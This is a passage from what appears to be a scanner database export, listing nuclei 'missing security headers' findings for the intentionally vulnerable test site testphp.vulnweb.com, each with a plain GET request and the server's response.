14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 5, + 27, + 28 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 604, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Repository", + "discovered_date": "2024-11-13T02:41:30.852Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Repository HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 8\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:56 GMT\r\nEtag: "4dca64a4-8"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\nacupart\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 605, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Repository", + "discovered_date": "2024-11-13T02:41:31.011Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Repository HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 8\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:56 GMT\r\nEtag: "4dca64a4-8"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\nacupart\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 606, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1", + "discovered_date": "2024-11-13T02:41:31.566Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 607, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1", + "discovered_date": "2024-11-13T02:41:31.711Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 608, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1", + "discovered_date": "2024-11-13T02:41:31.858Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 609, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1", + "discovered_date": "2024-11-13T02:41:32.014Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 610, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1", + "discovered_date": "2024-11-13T02:41:32.172Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 611, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1", + "discovered_date": "2024-11-13T02:41:32.316Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 612, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1", + "discovered_date": "2024-11-13T02:41:32.463Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 613, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1", + "discovered_date": "2024-11-13T02:41:32.625Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 614, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1", + "discovered_date": "2024-11-13T02:41:32.772Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable 